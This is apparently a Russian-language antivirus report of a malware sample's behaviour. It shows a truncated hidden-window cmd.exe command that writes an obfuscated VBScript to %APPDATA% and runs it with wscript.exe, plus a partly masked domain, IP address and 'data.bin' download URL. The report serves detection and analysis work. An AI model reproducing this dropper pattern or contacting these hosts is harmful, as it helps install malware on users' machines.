Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "VFiOY=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM MgWH" "fUNcTiON Dtds6J(Locu)" "Gu3=46" "Dtds6J=aSC(Locu)" "Mc=34" "EnD fUnCtion" "sUb SAja()" "BhP4Zq9=50" "Dim Oip, BXCNxmr" "For O...
- %APPDATA%\14583.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\14583.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "VFiOY=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM MgWH" "fUNcTiON Dtds6J(Locu)" "Gu3=46" "Dtds6J=aSC(Locu)" "Mc=34" "EnD fUnCtion" "sUb SAja()" "BhP4Zq9=50" "Dim Oip, BXCNxmr" "For O...' (со скрытым окном)